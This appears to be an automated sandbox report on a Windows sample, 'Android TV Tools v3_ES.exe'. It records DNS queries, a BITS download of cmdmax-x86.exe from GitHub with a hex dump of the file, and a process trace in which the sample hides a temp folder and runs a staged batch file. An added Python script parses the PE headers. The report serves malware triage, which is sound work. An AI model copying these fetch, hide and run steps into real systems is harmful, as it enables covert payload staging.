| May 25, 2024 20:59:03.519340992 CEST | 53 | 60005 | 1.1.1.1 | 192.168.2.5 |
| Timestamp | Source IP | Dest IP | Checksum | Code | Type |
|---|---|---|---|---|---|
| May 25, 2024 20:58:56.347645044 CEST | 192.168.2.5 | 142.250.186.46 | 4d5a | | Echo |
| May 25, 2024 20:58:56.354079962 CEST | 142.250.186.46 | 192.168.2.5 | 555a | | Echo Reply |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| May 25, 2024 20:58:56.328916073 CEST | 192.168.2.5 | 1.1.1.1 | 0x4002 | Standard query (0) | google.com | A (IP address) | IN (0x0001) | false |
| May 25, 2024 20:59:02.321845055 CEST | 192.168.2.5 | 1.1.1.1 | 0x134e | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false |
| May 25, 2024 20:59:03.428020954 CEST | 192.168.2.5 | 1.1.1.1 | 0xa53b | Standard query (0) | objects.githubusercontent.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| May 25, 2024 20:58:56.337934017 CEST | 1.1.1.1 | 192.168.2.5 | 0x4002 | No error (0) | google.com | | 142.250.186.46 | A (IP address) | IN (0x0001) | false |
| May 25, 2024 20:59:02.350922108 CEST | 1.1.1.1 | 192.168.2.5 | 0x134e | No error (0) | github.com | | 140.82.121.4 | A (IP address) | IN (0x0001) | false |
| May 25, 2024 20:59:03.519340992 CEST | 1.1.1.1 | 192.168.2.5 | 0xa53b | No error (0) | objects.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false |
| May 25, 2024 20:59:03.519340992 CEST | 1.1.1.1 | 192.168.2.5 | 0xa53b | No error (0) | objects.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false |
| May 25, 2024 20:59:03.519340992 CEST | 1.1.1.1 | 192.168.2.5 | 0xa53b | No error (0) | objects.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false |
| May 25, 2024 20:59:03.519340992 CEST | 1.1.1.1 | 192.168.2.5 | 0xa53b | No error (0) | objects.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false |
                      • github.com
                      • objects.githubusercontent.com
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49707 | 140.82.121.4 | 443 | 6360 | C:\Windows\System32\svchost.exe |

2024-05-25 18:59:03 UTC, 183 bytes, OUT:
HEAD /tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: github.com

2024-05-25 18:59:03 UTC, 997 bytes, IN:
HTTP/1.1 302 Found
Server: GitHub.com
Date: Sat, 25 May 2024 18:59:03 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/50417431/6e51c424-c3ca-11e5-97ed-aaf014dfa1f3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240525%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240525T185903Z&X-Amz-Expires=300&X-Amz-Signature=fff4a0719c293d9eda64204276fdc932c8a5e83c54ec30c201cfc9b24ace8e09&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=50417431&response-content-disposition=attachment%3B%20filename%3Dcmdmax-x86.exe&response-content-type=application%2Foctet-stream
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade

2024-05-25 18:59:03 UTC, 3020 bytes, IN:
                      2024-05-25 18:59:03 UTC3020INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.5 | 49708 | 185.199.108.133 | 443 | 6360 | C:\Windows\System32\svchost.exe |

2024-05-25 18:59:04 UTC, 661 bytes, OUT:
HEAD /github-production-release-asset-2e65be/50417431/6e51c424-c3ca-11e5-97ed-aaf014dfa1f3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240525%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240525T185903Z&X-Amz-Expires=300&X-Amz-Signature=fff4a0719c293d9eda64204276fdc932c8a5e83c54ec30c201cfc9b24ace8e09&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=50417431&response-content-disposition=attachment%3B%20filename%3Dcmdmax-x86.exe&response-content-type=application%2Foctet-stream HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: objects.githubusercontent.com

2024-05-25 18:59:04 UTC, 811 bytes, IN:
HTTP/1.1 200 OK
Connection: close
Content-Length: 27136
Content-Type: application/octet-stream
Content-MD5: NDSN1VdGjUAa5L+uLoUO7g==
Last-Modified: Wed, 08 Dec 2021 04:12:16 GMT
ETag: "0x8D9BA00EB94CF21"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e755e90b-201e-0070-6ff3-8758a2000000
x-ms-version: 2020-10-02
x-ms-creation-time: Wed, 18 Aug 2021 01:46:03 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
Content-Disposition: attachment; filename=cmdmax-x86.exe
x-ms-server-encrypted: true
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Age: 2261
Date: Sat, 25 May 2024 18:59:04 GMT
X-Served-By: cache-iad-kcgs7200171-IAD, cache-ewr18153-EWR
X-Cache: HIT, HIT
X-Cache-Hits: 164, 0
X-Timer: S1716663544.121505,VS0,VE41


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.5 | 49709 | 140.82.121.4 | 443 | 6360 | C:\Windows\System32\svchost.exe |

2024-05-25 18:59:04 UTC, 234 bytes, OUT:
GET /tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 08 Dec 2021 04:12:16 GMT
User-Agent: Microsoft BITS/7.8
Host: github.com

2024-05-25 18:59:05 UTC, 997 bytes, IN:
HTTP/1.1 302 Found
Server: GitHub.com
Date: Sat, 25 May 2024 18:59:03 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/50417431/6e51c424-c3ca-11e5-97ed-aaf014dfa1f3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240525%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240525T185903Z&X-Amz-Expires=300&X-Amz-Signature=fff4a0719c293d9eda64204276fdc932c8a5e83c54ec30c201cfc9b24ace8e09&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=50417431&response-content-disposition=attachment%3B%20filename%3Dcmdmax-x86.exe&response-content-type=application%2Foctet-stream
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade

2024-05-25 18:59:05 UTC, 3021 bytes, IN:
                      2024-05-25 18:59:05 UTC3021INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 3 | 192.168.2.5 | 49710 | 185.199.108.133 | 443 | 6360 | C:\Windows\System32\svchost.exe |

2024-05-25 18:59:05 UTC, 712 bytes, OUT:
GET /github-production-release-asset-2e65be/50417431/6e51c424-c3ca-11e5-97ed-aaf014dfa1f3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240525%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240525T185903Z&X-Amz-Expires=300&X-Amz-Signature=fff4a0719c293d9eda64204276fdc932c8a5e83c54ec30c201cfc9b24ace8e09&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=50417431&response-content-disposition=attachment%3B%20filename%3Dcmdmax-x86.exe&response-content-type=application%2Foctet-stream HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 08 Dec 2021 04:12:16 GMT
User-Agent: Microsoft BITS/7.8
Host: objects.githubusercontent.com

2024-05-25 18:59:05 UTC, 813 bytes, IN:
HTTP/1.1 200 OK
Connection: close
Content-Length: 27136
Content-Type: application/octet-stream
Content-MD5: NDSN1VdGjUAa5L+uLoUO7g==
Last-Modified: Wed, 08 Dec 2021 04:12:16 GMT
ETag: "0x8D9BA00EB94CF21"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e755e90b-201e-0070-6ff3-8758a2000000
x-ms-version: 2020-10-02
x-ms-creation-time: Wed, 18 Aug 2021 01:46:03 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
Content-Disposition: attachment; filename=cmdmax-x86.exe
x-ms-server-encrypted: true
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Sat, 25 May 2024 18:59:05 GMT
Age: 1
X-Served-By: cache-iad-kcgs7200171-IAD, cache-nyc-kteb1890083-NYC
X-Cache: HIT, HIT
X-Cache-Hits: 9, 1
X-Timer: S1716663546.843359,VS0,VE28
                      2024-05-25 18:59:05 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 c4 e4 52 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 03 00 00 44 00 00 00 34 00 00 00 00 00 00 70 17 00 00 00 10 00 00 00 60 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 00 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELRD4p`@
                      2024-05-25 18:59:05 UTC1378INData Raw: 40 00 51 8b 4c 24 14 51 6a 01 50 e8 46 1a 00 00 83 c4 1c 85 c0 75 06 b8 ff ff ff 7f c3 83 e8 02 c3 cc cc cc cc cc a1 74 82 40 00 85 c0 74 02 ff d0 68 10 70 40 00 68 08 70 40 00 e8 d6 00 00 00 83 c4 08 68 04 70 40 00 68 00 70 40 00 e8 c4 00 00 00 83 c4 08 c3 8b 44 24 04 6a 00 6a 00 50 e8 32 00 00 00 83 c4 0c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 6a 00 6a 01 50 e8 12 00 00 00 83 c4 0c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc c7 05 c0 75 40 00 01 00 00 00 83 7c 24 08 00 53 56 8b 5c 24 14 88 1d bc 75 40 00 75 3f 83 3d 78 82 40 00 00 74 24 8b 35 70 82 40 00 83 ee 04 3b 35 78 82 40 00 72 13 8b 06 85 c0 74 02 ff d0 83 ee 04 3b 35 78 82 40 00 73 ed 68 1c 70 40 00 68 14 70 40 00 e8 27 00 00 00 83 c4 08 68 24 70 40 00 68 20 70 40 00 e8 15 00
                      Data Ascii: @QL$QjPFut@thp@hp@hp@hp@D$jjP2D$jjPu@|$SV\$u@u?=x@t$5p@;5x@rt;5x@shp@hp@'h$p@h p@
                      2024-05-25 18:59:05 UTC1378INData Raw: 00 00 a1 74 78 40 00 50 6a 08 ff d2 83 c4 08 89 3d 74 78 40 00 eb 10 c7 40 08 00 00 00 00 8b 40 04 50 ff d2 83 c4 04 b8 ff ff ff ff 5f 89 35 78 78 40 00 5e c3 8b 4c 24 10 51 ff 15 40 a1 40 00 5f 5e c3 cc ba f0 77 40 00 8b 4c 24 04 39 0a 74 16 83 c2 0c a1 70 78 40 00 8d 04 40 8d 04 85 f0 77 40 00 3b c2 77 e6 8b 02 2b c1 83 f8 01 1b c0 23 c2 c3 cc 83 ec 04 8b 15 b8 72 40 00 53 56 57 33 f6 55 80 3a 00 74 1a 80 3a 3d 74 01 46 8b fa b9 ff ff ff ff 2b c0 f2 ae f7 d1 03 d1 80 3a 00 75 e6 8d 04 b5 04 00 00 00 50 e8 a5 11 00 00 a3 a4 75 40 00 83 c4 04 8b d8 85 db 75 0a 6a 09 e8 70 eb ff ff 83 c4 04 8b 2d b8 72 40 00 8b c5 80 7d 00 00 74 5e 8b fd b9 ff ff ff ff 2b c0 f2 ae f7 d1 89 4c 24 10 80 7d 00 3d 74 3d 51 e8 62 11 00 00 83 c4 04 89 03 85 c0 75 0a 6a 09 e8 32
                      Data Ascii: tx@Pj=tx@@@P_5xx@^L$Q@@_^w@L$9tpx@@w@;w+#r@SVW3U:t:=tF+:uPu@ujp-r@}t^+L$}=t=Qbuj2
                      2024-05-25 18:59:05 UTC1378INData Raw: c4 04 c3 33 c0 5d 5f 5e 5b 83 c4 04 c3 cc cc cc cc cc 8b 44 24 04 83 ec 18 53 56 57 55 50 e8 cf 01 00 00 83 c4 04 8b e8 39 2d 8c 79 40 00 75 0a 33 c0 5d 5f 5e 5b 83 c4 18 c3 85 ed 75 0f e8 5f 02 00 00 33 c0 5d 5f 5e 5b 83 c4 18 c3 c7 44 24 10 00 00 00 00 b8 b0 79 40 00 39 28 0f 84 9b 00 00 00 83 c0 30 ff 44 24 10 3d a0 7a 40 00 72 ea 8d 44 24 14 50 55 ff 15 5c a1 40 00 83 f8 01 0f 85 43 01 00 00 bf 88 78 40 00 33 c0 b9 40 00 00 00 f3 ab aa 83 7c 24 14 01 0f 86 06 01 00 00 8d 74 24 1a 38 44 24 1a 74 2c 8a 4e 01 84 c9 74 25 33 c0 33 d2 8a 06 8a d1 3b d0 72 11 80 88 89 78 40 00 04 40 33 c9 8a 4e 01 3b c8 73 ef 83 c6 02 80 3e 00 75 d4 b8 01 00 00 00 80 88 89 78 40 00 08 40 3d ff 00 00 00 72 f1 55 89 2d 8c 79 40 00 e8 4d 01 00 00 83 c4 04 e9 af 00 00 00 bf 88
                      Data Ascii: 3]_^[D$SVWUP9-y@u3]_^[u_3]_^[D$y@9(0D$=z@rD$PU\@Cx@3@|$t$8D$t,Nt%33;rx@@3N;s>ux@@=rU-y@M
                      2024-05-25 18:59:05 UTC1378INData Raw: 89 43 0c ff 54 8f 08 8b 7b 08 8d 0c 76 8b 34 8f eb a1 b8 00 00 00 00 eb 1c b8 01 00 00 00 eb 15 55 8d 6b 10 6a ff 53 e8 3a f3 ff ff 83 c4 08 5d b8 01 00 00 00 5d 5f 5e 5b 8b e5 5d c3 55 8b 4c 24 08 8b 29 8b 41 1c 50 8b 41 18 50 e8 15 f3 ff ff 83 c4 08 5d c2 04 00 cc cc cc cc cc cc cc cc a1 c4 72 40 00 83 f8 01 74 0d 85 c0 75 2e 83 3d c8 72 40 00 01 75 25 68 fc 00 00 00 e8 1f 00 00 00 83 c4 04 a1 98 7d 40 00 85 c0 74 02 ff d0 68 ff 00 00 00 e8 07 00 00 00 83 c4 04 c3 cc cc cc 81 ec a8 01 00 00 33 c0 b9 10 7d 40 00 53 8b 94 24 b0 01 00 00 56 57 55 39 11 74 0c 83 c1 08 40 81 f9 98 7d 40 00 72 f0 39 14 c5 10 7d 40 00 8d 1c c5 00 00 00 00 0f 85 a7 01 00 00 83 3d c4 72 40 00 01 0f 84 5f 01 00 00 83 3d c4 72 40 00 00 75 0d 83 3d c8 72 40 00 01 0f 84 49 01 00 00
                      Data Ascii: CT{v4UkjS:]]_^[]UL$)APAP]r@tu.=r@u%h}@th3}@S$VWU9t@}@r9}@=r@_=r@u=r@I
                      2024-05-25 18:59:05 UTC1378INData Raw: ff ff 5f c7 05 7c 75 40 00 09 00 00 00 c7 05 80 75 40 00 00 00 00 00 5e 5b c3 cc cc cc cc 56 ff 05 78 75 40 00 8b 74 24 08 68 00 10 00 00 e8 fb 01 00 00 83 c4 04 89 46 08 85 c0 74 0d 83 4e 0c 08 c7 46 18 00 10 00 00 eb 11 83 4e 0c 04 8d 46 14 89 46 08 c7 46 18 02 00 00 00 8b 46 08 89 06 c7 46 04 00 00 00 00 5e c3 cc cc cc cc cc 8b 54 24 04 39 15 68 81 40 00 77 03 33 c0 c3 8b c2 83 e2 1f 83 e0 e7 c1 f8 03 8b 88 70 81 40 00 33 c0 8a 44 d1 04 83 e0 40 c3 cc cc cc cc cc cc 8b 4c 24 04 83 ec 04 85 c9 75 06 33 c0 83 c4 04 c3 83 3d 38 7e 40 00 00 75 2b 66 81 7c 24 0c ff 00 76 13 b8 ff ff ff ff 83 c4 04 c7 05 7c 75 40 00 2a 00 00 00 c3 8a 44 24 0c 88 01 b8 01 00 00 00 83 c4 04 c3 8d 44 24 00 8b 15 d4 77 40 00 c7 44 24 00 00 00 00 00 50 6a 00 52 a1 48 7e 40 00 51
                      Data Ascii: _|u@u@^[Vxu@t$hFtNFNFFFFF^T$9h@w3p@3D@L$u3=8~@u+f|$v|u@*D$D$w@D$PjRH~@Q
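The hex dump above is easier to read once the bytes are parsed as PE headers. The following is an added example, not part of the Joe Sandbox report: HEADER_HEX holds the first 256 bytes transcribed from the first "Data Raw" line of the response (an MZ stub followed by a PE32 header), and parse_pe_headers walks the DOS, COFF and optional headers using the field offsets and flag values of the PE/COFF format. The function and constant names are this example's own.

```python
"""Parse the PE headers at the start of the HTTP response body shown above.

Added example, not part of the Joe Sandbox report. HEADER_HEX is the first
256 bytes transcribed from the response's first 'Data Raw' line; offsets and
flag values follow the PE/COFF format, the names are this example's own.
"""
import struct
from datetime import datetime, timezone

HEADER_HEX = """
4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 80000000
0e1fba0e 00b409cd 21b8014c cd215468 69732070 726f6772 616d2063 616e6e6f
74206265 2072756e 20696e20 444f5320 6d6f6465 2e0d0d0a 24000000 00000000
50450000 4c010500 91c4e452 00000000 00000000 e0000e01 0b010300 00440000
00340000 00000000 70170000 00100000 00600000 00004000 00100000 00020000
04000000 00000000 04000000 00000000 00c00000 00040000 00000000 03000000
00001000 00100000 00001000 00100000 00000000 10000000 00000000 00000000
"""

IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_FILE_DLL = 0x2000
# IMAGE_DLLCHARACTERISTICS_* bits that matter for exploit mitigations.
DLLCHAR = {"aslr": 0x0040, "nx": 0x0100, "no_seh": 0x0400, "cfg": 0x4000}
SUBSYSTEMS = {2: "WINDOWS_GUI", 3: "WINDOWS_CUI"}


def parse_pe_headers(data: bytes) -> dict:
    """DOS header -> COFF file header -> PE32 optional header; return the
    fields a triage analyst looks at first. Raises on a malformed image."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    (machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, chars) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20  # optional header directly follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic != 0x10B:
        raise ValueError(f"not a PE32 image (magic {magic:#x})")
    # Optional header offsets: AddressOfEntryPoint +16, BaseOfCode +20,
    # BaseOfData +24, ImageBase +28; SizeOfImage +56, SizeOfHeaders +60,
    # CheckSum +64, Subsystem +68, DllCharacteristics +70.
    entry, _code, _data, image_base = struct.unpack_from("<IIII", data, opt + 16)
    (size_of_image, size_of_headers, checksum,
     subsystem, dll_chars) = struct.unpack_from("<IIIHH", data, opt + 56)
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,
        "is_x86": machine == IMAGE_FILE_MACHINE_I386,
        "sections": nsections,
        "timestamp": timestamp,
        "compiled_utc": datetime.fromtimestamp(timestamp, timezone.utc).isoformat(),
        "characteristics": chars,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "optional_header_size": opt_size,
        "entry_point": entry,
        "image_base": image_base,
        "size_of_image": size_of_image,
        "size_of_headers": size_of_headers,
        "checksum": checksum,
        "subsystem": SUBSYSTEMS.get(subsystem, subsystem),
        "dll_characteristics": dll_chars,
        **{name: bool(dll_chars & bit) for name, bit in DLLCHAR.items()},
    }


if __name__ == "__main__":
    for key, val in parse_pe_headers(bytes.fromhex(HEADER_HEX)).items():
        shown = f"{val:#x}" if type(val) is int else val
        print(f"{key:<22} {shown}")
```

The ImageBase of 0x400000 read from this header agrees with the Imagebase the process list records for cmdmax.exe (Target ID 14), and the response time matches that process's start time, which is consistent with this response being the cmdmax-x86.exe fetched by Start-BitsTransfer. A DllCharacteristics of 0 means the image opts into neither ASLR nor DEP; a CheckSum of 0 only means the linker did not compute one, which is normal for non-driver executables and is not by itself evidence of tampering.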



                      Target ID:0
                      Start time:14:58:54
                      Start date:25/05/2024
                      Path:C:\Users\user\Desktop\Android TV Tools v3_ES.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Android TV Tools v3_ES.exe"
                      Imagebase:0x400000
                      File size:389'816 bytes
                      MD5 hash:66773F373DE9E1AA11B3F2E6F74967AF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:1
                      Start time:14:58:54
                      Start date:25/05/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:2
                      Start time:14:58:54
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\afolder" mkdir "C:\Users\user\AppData\Local\Temp\afolder"
                      Imagebase:0x790000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:3
                      Start time:14:58:54
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\ytmp" mkdir "C:\Users\user\AppData\Local\Temp\ytmp"
                      Imagebase:0x790000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:4
                      Start time:14:58:54
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c attrib +h C:\Users\user\AppData\Local\Temp\ytmp
                      Imagebase:0x790000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:5
                      Start time:14:58:54
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\attrib.exe
                      Wow64 process (32bit):true
                      Commandline:attrib +h C:\Users\user\AppData\Local\Temp\ytmp
                      Imagebase:0xda0000
                      File size:19'456 bytes
                      MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:7
                      Start time:14:58:54
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat"
                      Imagebase:0x790000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:8
                      Start time:14:58:55
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe"
                      Imagebase:0x790000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:9
                      Start time:14:58:55
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe"
                      Imagebase:0x790000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:10
                      Start time:14:58:55
                      Start date:25/05/2024
                      Path:C:\Windows\SysWOW64\PING.EXE
                      Wow64 process (32bit):true
